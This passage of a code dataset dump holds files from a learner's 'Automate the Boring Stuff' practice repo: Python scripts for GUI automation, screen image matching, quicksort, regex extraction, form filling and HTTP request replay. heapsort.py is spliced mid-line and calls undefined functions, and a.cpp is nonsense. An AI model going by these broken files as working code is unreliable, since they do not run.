"text": "def formatT(t, w, type):\n if type == \"left\":\n return t + (' ' * (w - len(t)))\n\n elif type == \"center\":\n return t.center(w);\n else:\n # return (' ' * (w - len(t))) + t;\n return t.rjust(w);\n\ndef flip(mylist):\n ns = list(range(len(mylist[0])))\n for j in range(len(mylist[0])):\n ns[j] = list(range(len(mylist)))\n for i in range(len(mylist)):\n ns[j][i] = mylist[i][j]\n mylist = ns\n return ns\n\ndef printTab(mylist):\n mylist = flip(mylist)\n cmax = [0 for x in range(len(mylist[0]))];\n for r in range(len(mylist)):\n for c in range(len(mylist[0])):\n cmax[c] = max(cmax[c], len(mylist[r][c]));\n ns = 1;\n for r in range(len(mylist)):\n for c in range(len(mylist[0])):\n print(formatT(mylist[r][c], cmax[c], \"right\"), end = (' ' * ns));\n print()\n\n\ndef test():\n tableData = [['apples', 'oranges', 'cherries', 'banana'], \n ['Alice', 'Bob', 'Carol', 'David'], \n ['dogs', 'cats', 'moose', 'goose']]\n printTab(tableData);\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 23.66666603088379,
"blob_id": "0c54188c05af8777da451bc3e4673835f52e400f",
"content_id": "3b65a271c3a7415a63145b56abbf90ef55618971",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 3,
"path": "/ShowImg.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import subprocess\ndef showImg(file):\n subprocess.Popen(['see', file]);\n"
},
{
"alpha_fraction": 0.44180938601493835,
"alphanum_fraction": 0.4624505937099457,
"avg_line_length": 22.968421936035156,
"blob_id": "6f33922e83a54d2646046ea348f0cab536cfe4c9",
"content_id": "b5ed05f7db53c4e501960ef374953a1d41d8e1db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2277,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 95,
"path": "/locateScreen.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\nfrom PIL import Image;\nimport numpy as np;\n\ndef locate(file, sim = 0.999):\n tmp = '/tmp/tmp.png'\n src = pyautogui.screenshot(tmp);\n #src = Image.open(tmp);\n key = Image.open(file);\n\n #f = findImg(src, key, sim);\n f = searchMatrix(convertToMatrix(src), convertToMatrix(key), sim);\n print(f);\n src.close();\n key.close();\n return f;\n\ndef convertColor(c):\n r, g, b = c;\n return (r + g + b) / 3 / 255;\n\ndef convertToMatrix(img):\n w, h = img.size;\n m = np.zeros(w * h).reshape(w, h);\n for x in range(w):\n for y in range(h):\n m[x][y] = convertColor(img.getpixel((x, y)));\n return m\n\ndef searchMatrix(src, key, sim):\n w, h = key.shape;\n dw, dh = src.shape\n dw = dw - w;\n dh = dh - h\n diff = 1.0 - sim;\n# print(\"diff:%f\"%diff);\n for x in range(dw):\n for y in range(dh):\n# if x%200 == 0:\n # print(\"search in (%d, %d)\"%(x, y));\n crop = src[x:x + w, y:y + h];\n d = crop - key;\n d = d * d;\n d\n dd = d.sum() / (w * h)\n# print(\"search in (%d, %d) dd:%f diff:%f\"%(x, y, dd, diff));\n if dd<= diff:\n return x, y;\n return None;\n\n\n\ndef getColorDiff(a, b):\n diff = 0;\n for i in range(3):\n d = a[i] - b[i];\n diff = diff + d * d;\n diff = diff / 195075;\n #diff = diff / 3;\n #diff = diff / 255 / 255;\n return diff;\n \ndef calDiff(src, key, dx, dy):\n w, h = key.size;\n diff = 0;\n count = 0;\n for x in range(0, w , int(w / 10)):\n for y in range(0, h , int(h / 10)):\n count = count + 1;\n diff = diff + getColorDiff(src.getpixel((dx + x, dy + y)),\n key.getpixel((x, y)));\n diff = diff/count;\n return diff;\n\n\ndef findImg(src, key, sim = 1):\n w, h = key.size;\n dw, dh = src.size\n dw = dw - w;\n dh = dh - h\n diff = 1 - sim;\n if dw<0 or dh<0 :\n return None\n\n for dx in range(dw + 1):\n for dy in range(dh + 1):\n if dx%10 == 0:\n print(\"search in (%d, %d)\"%(dx, dy));\n if calDiff(src, key, dx, dy)<=diff:\n return dx, dy;\n #cal \n return None;\n\n\n#print(locate('firefox.png'));\n"
},
{
"alpha_fraction": 0.44106462597846985,
"alphanum_fraction": 0.5095056891441345,
"avg_line_length": 22.909090042114258,
"blob_id": "b09b53818bfee6634b741f0c8bd41ee1664cba15",
"content_id": "c8ee7e9e2d84f25f85dae83f8a5c9e148b022234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/strip.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import re\n\ndef strip(s, r = ' '):\n rg = re.compile(r'^' + r + r\"*(.+?)\" + r + r'*$', re.DOTALL);\n res = rg.search(s).group(1);\n print(res);\n print(rg.search(s).groups());\n print(s.strip(r) == res);\n return res;\n\nstrip('123123 12 31 412 3321');\n"
},
{
"alpha_fraction": 0.5931034684181213,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28,
"blob_id": "adf189d77100d10c962e4f4329ab07edf62a3065",
"content_id": "bae10c21dbb0e49cb3d5d82373a7664187bbe2cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 10,
"path": "/moveMouse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\n\ndur = 0.25\npyautogui.FAILSAFE = True\npyautogui.PAUSE = 0.5\nfor i in range(10):\n pyautogui.moveRel(100, 0, duration = dur);\n pyautogui.moveRel(0, 100, duration = dur);\n pyautogui.moveRel( -100, 0, duration = dur);\n pyautogui.moveRel( 0, -100, duration = dur);\n"
},
{
"alpha_fraction": 0.5215686559677124,
"alphanum_fraction": 0.5647059082984924,
"avg_line_length": 35.42856979370117,
"blob_id": "f1c8fbd7ed80d2f93edd9b0e28b19f460245e54c",
"content_id": "173feabd88535410bc50bda9a17a27fbc7c44af8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/detectLargeFile.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os\nfor cf, sb, files in os.walk('/home/ailab'):\n for file in files:\n file = os.path.join(cf, file)\n if not os.path.islink(file):\n if os.path.getsize(file)>100 * 1024 * 1024:\n print(os.path.abspath(file));\n"
},
{
"alpha_fraction": 0.42566511034965515,
"alphanum_fraction": 0.44600939750671387,
"avg_line_length": 20.233333587646484,
"blob_id": "cbf1c55a04d7f546d3dc71dfa35e10caf12d550f",
"content_id": "add9a0a682585def07093c49e571d810c663c520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 30,
"path": "/heapsort.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def swap(a,l, r):\n t = a[l];\n a[l] = a[r];\n a[r] = t;\n\ndef heapsort(a, key = None):\n if key is None:\n key = lambda x:x\n quicksort(a, 0, len(a), key);\n return a;\n \n\ndef heapsort(a, size, key):\n if(l + 1 >= r):\n return;\n mid = partition(a, l, r, key)\n quicksort(a, l, mid, key);\n quicksort(a, mid + 1, r, key);\n\ndef quicksortk(a, ldef test():\n b = [[4, 1], [2, 1], [1, 3], [1, 100]];\n a = b[:];\n print(a);\n print(b);\n qsort(a);\n print(\"after qsort(a).\");\n print(a);\n print(b);\n for i in range(len(b)):\n print(\"getk(b, \" , str(i) , \") = \",getk(b, i));\n\n\n"
},
{
"alpha_fraction": 0.5365535020828247,
"alphanum_fraction": 0.5483028888702393,
"avg_line_length": 33.818180084228516,
"blob_id": "71c85695bbed7978fb96aa41f8e789c5fadbb59c",
"content_id": "6d2e78ef44dce248cb265bac9cab7fa6b1e6ca0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 766,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 22,
"path": "/demo.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def printTD(tuples,dicts):\n\t\"\"\"it receives two args, tuples, dicts.\"\"\"\n\tfor i in range(len(tuples)):\n\t\tprint(\"tuples[\" + str(i) + \"] = \" + str(tuples[i]), end = ', ');\n\tkeys = sorted(dicts.keys(), key = lambda x:len(x));\n\tfor j in keys:\n\t\tprint(\"dicts[\" + str(j) + \"] = \" + str(dicts[j]), end = ', ');\n\ndef foo(arg0, *tuples, **dicts):\n\t\"\"\"This is foo function, it receives any number of args.\"\"\"\n\tprint(\"foo.__doc__ = \" + foo.__doc__);\n\tprint(\"foo(arg0:\"+str( arg0), end = ', ');\n\tprintTD(tuples, dicts);\n\tprint(\")\");\n\tbar( *tuples, ** dicts);\n\ndef bar(arg0, arg1, *tuples, **dicts):\n\t\"\"\"This is bar function\"\"\"\n\tprint(\"bar.__doc__ = \" + bar.__doc__);\n\tprint(\"bar(arg0:\" + str(arg0) + \", arg1:\" + str(arg1), end = ', ');\n\tprintTD(tuples, dicts);\n\tprint(\")\");\n"
},
{
"alpha_fraction": 0.6613546013832092,
"alphanum_fraction": 0.675298810005188,
"avg_line_length": 30.375,
"blob_id": "dd6d3c8b974bcdae1c5bc9601ec6efee4b44bdee",
"content_id": "2fd66357b6920d834363eaedf5b0d0c97849df2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 16,
"path": "/lucksearch.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "#! python3\n# lucksearch.py - Open several Google search results.\nimport requests, sys, webbrowser, bs4\n#get the command line args.\nprint('Googling...');\nres = requests.get('https://google.com/search?q=' + ' '.join(sys.argv[1:]))\nres.raise_for_status();\n\n#get the top5 links in search page.\nsoup = bs4.BeautifulSoup(res.text);\n\n#open all the 5 links.\nlink = soup.select('.r a');\nnumOpen = min(5, len(link));\nfor i in range(numOpen):\n webbrowser.open('https://google.com' + link[i].get('href'));\n"
},
{
"alpha_fraction": 0.4423076808452606,
"alphanum_fraction": 0.45604395866394043,
"avg_line_length": 21.369230270385742,
"blob_id": "1b33528ff71393316a07c74c553ace46a63af805",
"content_id": "eec7ed3421fa62d4cdd39874f08c519f2d416f30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1456,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 65,
"path": "/quicksort.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def swap(a,l, r):\n if l == r:\n return;\n t = a[l];\n a[l] = a[r];\n a[r] = t;\n\ndef partition(a, l, r, key):\n pivot = a[l];\n kp = key(pivot)\n r = r - 1;\n swap(a, l, r);\n left = l;#pointing next biggerOrEqual than pivot.\n while l < r:\n if(key(a[l])<kp):\n swap(a, l, left);\n left = left + 1;\n l = l + 1;\n swap(a,r, left);\n return left;\n\ndef qsort(a, key = None):\n if key is None:\n key = lambda x:x\n quicksort(a, 0, len(a), key);\n return a;\n \n\ndef quicksort(a, l, r, key):\n if(l + 1 >= r):\n return;\n mid = partition(a, l, r, key)\n quicksort(a, l, mid, key);\n quicksort(a, mid + 1, r, key);\n\ndef quicksortk(a, l, r, k, key):\n \"\"\"This is the unstable version of quicksort.\"\"\"\n if(l + 1 >= r):\n return a[k];\n mid = partition(a, l, r, key)\n if(mid == k):\n return a[k];\n if(k<mid):\n return quicksortk(a, l, mid ,k, key);\n else:\n return quicksortk(a, mid + 1, r, k, key);\n\ndef getk(a, k, key = None):\n if key is None:\n key = lambda x:x\n if(k<0 or k >= len(a)):\n return None;\n return quicksortk(a, 0, len(a), k, key);\n\ndef test():\n b = [[4, 1], [2, 1], [1, 3], [1, 100]];\n a = b[:];\n print(a);\n print(b);\n qsort(a);\n print(\"after qsort(a).\");\n print(a);\n print(b);\n for i in range(len(b)):\n print(\"getk(b, \" , str(i) , \") = \",getk(b, i));\n\n\n"
},
{
"alpha_fraction": 0.4381868243217468,
"alphanum_fraction": 0.44093406200408936,
"avg_line_length": 25.962963104248047,
"blob_id": "f4465ed5542b2165d1ae04bfb664a2b0ef514c16",
"content_id": "1da4935c3b6d306dda4a15c19838ad2229ea0cc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 27,
"path": "/findInAlltxt.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os, re\n\ndef usage():\n print(\"\"\"\\\nUsage: findInAlltxt.py [OPTION]... PATTERN [FILE]...\nTry 'findInAlltxt.py --help' for more information.\n\"\"\");\nif len(os.sys.argv) == 1:\n usage()\nelse:\n reg = re.compile(os.sys.argv[1]);\n isFind = False;\n for cf, sub, f in os.walk('.'):\n for file in f:\n file = os.path.join(cf, file);\n if file.endswith(\".txt\"):\n f = open(file, 'r');\n fx = f.read();\n m = reg.search(fx);\n if m is not None:\n isFind = True;\n print(file + \":\");\n print(\"\\t\" + m.group());\n f.close();\n\n if not isFind:\n print(\"Not Found.\");\n"
},
{
"alpha_fraction": 0.59375,
"alphanum_fraction": 0.59375,
"avg_line_length": 7,
"blob_id": "133b330a9379100eddc7ec411f92c9483b6fb7d0",
"content_id": "f08393dd5c75773585f254f66afab3bdff041cbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 4,
"path": "/a.cpp",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "int main(){\n\tadfasdf;\n\tadfaf;\n}\n"
},
{
"alpha_fraction": 0.5997304320335388,
"alphanum_fraction": 0.6199460625648499,
"avg_line_length": 21.484848022460938,
"blob_id": "bbdbac1395a049d7d563b3b37d27d837717af0d7",
"content_id": "9ec45de057283e153dec3d70fcb6071988386ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 742,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 33,
"path": "/multiplicationTable.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "# python3\n# multiplicationTable.py num - save multiplicationTable in a spreadsheet.\nimport openpyxl, openpyxl.cell\nimport os\n\n#read command line.\nif len(os.sys.argv) < 2:\n num = 5;\nelse:\n num = int(os.sys.argv[1]);\n\nprint(\"Creating multiplicationTable with num = %d, saving to m%d.xlsx\"%(num,\n num));\n\n#create the table.\nwb = openpyxl.Workbook();\nwb.remove_sheet(wb.active)\ns = wb.create_sheet(\"multiplicationTable(num=%d)\"%num);\ntable = [0] * num\nfor i in range(1, num + 1):\n table[i - 1] = [0] * num\n for j in range(1, num + 1):\n table[i - 1][j - 1] = i * j\n cn =openpyxl.cell.get_column_letter(j) + str(i) \n s[cn] = table[i - 1][j - 1];\n\nwb.save('m%d.xlsx'%num);\n\n\n\n\n\n#save the table into spread sheet.\n"
},
{
"alpha_fraction": 0.7547892928123474,
"alphanum_fraction": 0.7547892928123474,
"avg_line_length": 42.5,
"blob_id": "4e931e764923e96f7e5fe9165fd72f43f936d140",
"content_id": "f65917da5ec8b1d04fa4dfd023114eb70393516a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 6,
"path": "/log.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import logging\n#logging.basicConfig(level = logging.DEBUG);\n#logging.basicConfig(level = logging.DEBUG, format = '%(message)s');\nlogging.basicConfig(level = logging.DEBUG, format = logging.BASIC_FORMAT)\nlogging.debug('adfadf');\nlogging.debug('what the fuck.');\n"
},
{
"alpha_fraction": 0.47698208689689636,
"alphanum_fraction": 0.4993606209754944,
"avg_line_length": 23.825397491455078,
"blob_id": "292119ba9932387aab0e714d578d3fdbc085442e",
"content_id": "f530888afbc90e0e3e374ca11280b0e32b091ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/parse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import urllib3\nimport random\ndef modify(s, key, v):\n v = str(v);\n v = v.replace('\"', '');\n key = key.replace('\"', '');\n key = '\"' + key + '\"';\n l = s.find('\"', s.find(':', s.find(key) + len(key)))\n r = s.find('\"', l + 1);\n #print(\"left:\", s[0:l]); \n #print(\"right:\", s[r:]);\n s = s[0:l + 1] + v + s[r:];\n # print(\"sssss:\", s);\n return s;\n\ndef dosth(s):\n mid = 14585825718840192\n mid = mid + random.randint(0, 1000);\n s = modify(s, \"Content\", \"This IS my New Content send by a Agent.\");\n s = modify(s, \"LocalID\", mid);\n s = modify(s, \"ClientMsgId\", mid);\n\n return s;\n\n#def parse(method,url, fields, headers):\ndef parse():\n f = open(\"requestData\");\n fx = f.read();\n fx = fx.replace(\" \", \" \");\n fx = fx.replace(\" \", \" \");\n fx = dosth(fx);\n #print(fx);\n ffx = fx.split(\"\\n\\n\");\n #print(ffx);\n sx = ffx[0].split(\" \");\n url = sx[1];\n method = sx[0];\n #\n hx = ffx[1].split(\"\\n\");\n headers = {};\n for i in hx:\n si = i.split(\": \");\n headers[si[0]] = si[1];\n\n fields = ffx[2];\n return (url, method, fields, headers);\n\ndef request():\n http = urllib3.PoolManager();\n\n #url =\"\"\n #method = \"\";\n #fields = {}\n #headers = {};\n #parse(url, method, fields, headers);\n parse();\n url, method, fields, headers = parse();\n print(\"url:\", url,\"\\nmethod:\", method,\"\\nfields:\", fields,\"\\nheaders:\", headers);\n res = http.urlopen(method, url, body = fields, headers = headers);\n print(res.status, res.data);\n\nrandom.seed();\nrequest();\n"
},
{
"alpha_fraction": 0.41796875,
"alphanum_fraction": 0.431640625,
"avg_line_length": 14.96875,
"blob_id": "3778487047718f70b10c6c93f7bb69f7fffe11fd",
"content_id": "43414479326454ba0dca0d6c1f66baa5495df42c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 32,
"path": "/findPhoneAndEmail.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyperclip, re\n\nphoneReg = re.compile(r'''(\n (\\d{3})\n (\\s|-|\\.)?\n (\\d{3})\n (\\s|-|\\.)?\n (\\d{4})\n )\n ''', re.VERBOSE);\n\nmailReg = re.compile(r'''\n (\\w+?@\\w+?(\\.\\w+) + )\n ''', re.VERBOSE);\n\ns = pyperclip.paste();\n#print(s)\np = phoneReg.findall(s);\nr = [];\n\nfor i in p:\n r.append(\"-\".join([i[1], i[3], i[5]]))\n\ne = mailReg.findall(s);\nfor i in e:\n r.append(i[0]);\n\nres = \"\\n\".join(r);\n#print(p);\n#print(e);\nprint(res)\npyperclip.copy(res);\n\n"
},
{
"alpha_fraction": 0.49499374628067017,
"alphanum_fraction": 0.4981226623058319,
"avg_line_length": 25.616666793823242,
"blob_id": "33300c36395c40b3c8023a8be158f51408ae6c04",
"content_id": "fdd689d048956159c20e9cccafa5fce4fd4d4ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 60,
"path": "/currentMouse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, threading, subprocess\nimport GetCh\nclass ShowCurrentMouse(threading.Thread):\n x = 0;\n y = 0;\n color = ();\n isStop = False;\n def __init__(self):\n super(ShowCurrentMouse, self).__init__();\n self.isStop = False;\n\n def getXY(self):\n return self.x, self.y;\n\n def getColor(self):\n return self.color;\n\n def stop(self):\n self.isStop = True;\n\n def run(self):\n mlen = 0;\n while not self.isStop:\n self.x, self.y = pyautogui.position();\n self.color = pyautogui.pixel(self.x, self.y);\n r, g, b = self.color;\n mess = 'Current Mouse: (%d, %d) color:(%d, %d, %d)'%(self.x,\n self.y,r, g, b);\n print('\\b'*mlen, end='');\n print(mess, end='', flush = True);\n mlen = len(mess);\n\n\ngetch = GetCh.getch;\nmythread = ShowCurrentMouse();\nprint(\"Ctrl - C or e to end.\");\ntry:\n mythread.start();\n f = open('saveMousePosition.txt', 'w');\n f.write(\"mousePos = {\\n\");\n while True:\n a = getch();\n if ord(a) == 3 or a == 'e':#ord(Ctrl - C) = 3.\n raise KeyboardInterrupt;\n break;\n x, y = mythread.getXY();\n r, g, b= mythread.getColor();\n\n mess ='\"' + str(a) + \"\\\" : [(%d, %d),(%d, %d, %d)],\"%(x, y, r, g, b);\n print(\"\\n\" + str(ord(a)) + mess);\n f.write(mess + \"\\n\");\n\n\nexcept KeyboardInterrupt:\n mythread.stop();\n mythread.join();\n f.write(\"\\b\\b}\");\n f.close();\n subprocess.Popen(['cat', 'saveMousePosition.txt']);\n print('\\nexiting...');\n\n"
},
{
"alpha_fraction": 0.5811518430709839,
"alphanum_fraction": 0.6282722353935242,
"avg_line_length": 19.052631378173828,
"blob_id": "59dde60db4a08cf629019c7a9ca5f09fd994f145",
"content_id": "c14882ecd5f5840e7c4f2643ee3dc9366e8b5f13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 19,
"path": "/takeScreenShot.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\nimport os\nimport GetCh\n\ngetch = GetCh.getch\nif len(os.sys.argv)>1:\n file = os.sys.argv[1];\nelse:\n file = 'screenshot.png'\n\na = getch();\np1= pyautogui.position();\nprint(p1);\na = getch();\np2= pyautogui.position();\nprint(p2);\nb = pyautogui.screenshot('/tmp/tmp.png', (p1[0], p1[1], p2[0] - p1[0], p2[1] - p1[1]));\nprint(\"saving to file:\", file);\nb.save(file);\n\n"
},
{
"alpha_fraction": 0.49837133288383484,
"alphanum_fraction": 0.5048859715461731,
"avg_line_length": 33,
"blob_id": "2a333362337f6b8f81e189a0ff1897faa4359e82",
"content_id": "077ad8df4431433443e5756e0dce37b0dd75de07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/searchFiles.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os, re\nts = os.sys.argv[1:];\nprint(\"Search files containing %s in %s\"%(','.join(ts), os.getcwd()));\nfor cf, sub, files in os.walk(os.getcwd()):\n for file in files:\n for t in ts:\n if not file.find(t) == - 1:\n f = os.path.join(cf, file);\n print(f);\n\n"
},
{
"alpha_fraction": 0.458083838224411,
"alphanum_fraction": 0.4754491150379181,
"avg_line_length": 26.816667556762695,
"blob_id": "88e7ea45dd4a201dc9c72559f176441d49956539",
"content_id": "1629f51d8be7e0f294eed9ac8959c7caf8c3ae28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 60,
"path": "/doQuestion.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import urllib3\nimport re\n\ndef doQ(i, an):\n l, r = getQ(i)\n print(\"Test Example\" + str(i) + \":\");\n print(l);\n print(r);\n #reg = re.compile('[A-Z]\\w* Nakamoto');\n reg = an[i];\n print(\"Should pass Cases:\");\n for i in l:\n m = reg.search(i);\n if m is None:\n print(\"fails\");\n else:\n print(m.group());\n\n print(\"Should fail Cases:\");\n for i in r:\n m = reg.search(i);\n if m is None:\n print(\"fails\");\n else:\n print(m.group());\n print();\n\ndef getQ(i):\n url='https://automatetheboringstuff.com/chapter7/'\n http = urllib3.PoolManager()\n data = http.request('GET', url).data;\n res = \"\"\n# r = re.compile(r'Q.*?' + str(i) + \"(. * ?)\" + r'(Q.*?' + str(i +1) + ')|(Practice)');\n r = re.compile(r'Q.+?(' + str(i) + \"\\. (.+?))\" + r'((Q.*?' + str(i +1) +\n ')|(Practice))');\n # r = re.compile(r'src', re.UNICODE)\n # print(str(data));\n res = r.search(str(data)).group(1);\n res = res.replace('\\\\', '');\n r1 = re.compile(r'match the following:(.*?)not the following:(.*)'\n );\n m = r1.search(res);\n r2 = re.compile(r\"'.*?'\");\n l = m.group(1);\n r = m.group(2);\n la = r2.findall(l);\n ra = r2.findall(r);\n la = '|'.join(la).replace('\\'', '').split('|');\n ra = '|'.join(ra).replace('\\'', '').split('|');\n return (la, ra);\n\n#print(data);\nan = [0] * 50;\nan[20] = re.compile(r'^(\\d{1,3}(,\\d{3})*)$');\nan[21] = re.compile(r'([A-Z]\\w* Nakamoto)');\nan[22] = re.compile(r'(Alice|Bob|Carol) (eats|pets|throws) (apples|cats|baseballs)\\.', re.IGNORECASE);\nfor i in range(20, 23):\n doQ(i, an);\n\n#print(q);\n\n"
},
{
"alpha_fraction": 0.6483516693115234,
"alphanum_fraction": 0.6703296899795532,
"avg_line_length": 23.81818199157715,
"blob_id": "d4055920409bb218c9048b7930dffc9a173c37a4",
"content_id": "ae2224f00c952dccd028b2f5ff048ac1597f4499",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 11,
"path": "/detectKey.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\n\ndef onKeyPress(event):\n text.insert('end', \"Pressed %s\\n\"%(event.char, ))\n\nroot = tk.Tk()\nroot.geometry('300x200');\ntext = tk.Text(root, background = 'black', foreground = 'white');\ntext.pack()\nroot.bind('<KeyPress>', onKeyPress);\nroot.mainloop();\n"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6598639488220215,
"avg_line_length": 23.25,
"blob_id": "b18200069570816c5d95fb8d630c4bcdca6d807a",
"content_id": "35c56d2d6fef50a0e27cbdc30bc48a079f9aa7f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 12,
"path": "/drawText.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "from PIL import Image, ImageDraw, ImageFont\nimport ShowImg;\n\ndef show(i):\n i.save('tmp.png');\n ShowImg.showImg('tmp.png');\n\nimg = Image.new('RGBA', (300, 300), 'blue');\ndraw = ImageDraw.Draw(img);\n#font = ImageFont.truetype(os.path.jogin(\ndraw.text((20, 20), 'hello world')\nshow(img);\n\n\n\n"
},
{
"alpha_fraction": 0.5250995755195618,
"alphanum_fraction": 0.5904382467269897,
"avg_line_length": 35.911766052246094,
"blob_id": "ae0b1c7b27c5a74b3b73042c9304f5298e1e075c",
"content_id": "08c036c3e54e2f3e8e0fc7c4917a009529b16646",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1255,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 34,
"path": "/formFiller.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, time\nimport webbrowser\nimport locateScreen\n\nmousePos = {\n\"1\" : [(756, 348),(255, 255, 255)],\n\"2\" : [(719, 854),(157, 162, 246)],\n\"3\" : [(822, 252),(255, 255, 255)],\n}\nformData = [\n {'name':'Alic', 'fear':'fuck', 'source':1, 'robocop':1,\n 'comments':'say hi'}];\n\npyautogui.PAUSE = 0.5\nwebbrowser.open('https://docs.google.com/forms/d/1A39NpQYMN8OOG-_lqDLFQb2h1SiHhCxPh0udtDEy2rU/viewform');\np = locateScreen.locate('firefox.png');\nif not p is None:\n pyautogui.doubleClick(p[0], p[1]);\nfor j in range(3):\n for person in formData:\n submit = mousePos[\"2\"];\n while not pyautogui.pixelMatchesColor(submit[0][0], submit[0][1], submit[1]):\n time.sleep(0.5);\n nameFile = mousePos[\"1\"];\n pyautogui.click(nameFile[0][0], nameFile[0][1]);\n pyautogui.typewrite(person['name'] + '\\t');\n pyautogui.typewrite(person['fear'] + '\\t');\n pyautogui.typewrite(['down'] * person['source'] + ['\\t']);\n pyautogui.typewrite(['right'] * person['robocop'] + ['\\t']);\n pyautogui.typewrite(person['comments'] + '\\t');\n pyautogui.press('enter');\n time.sleep(3);\n otherLink = mousePos[\"3\"];\n pyautogui.click(otherLink[0][0], otherLink[0][1]);\n"
},
{
"alpha_fraction": 0.5460420250892639,
"alphanum_fraction": 0.5476574897766113,
"avg_line_length": 23.760000228881836,
"blob_id": "af56e28c0454ef7c96d757c08a67422deda43e80",
"content_id": "9b76c3d2da01daf71460ffe4ecfc80b7d4d0596b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 25,
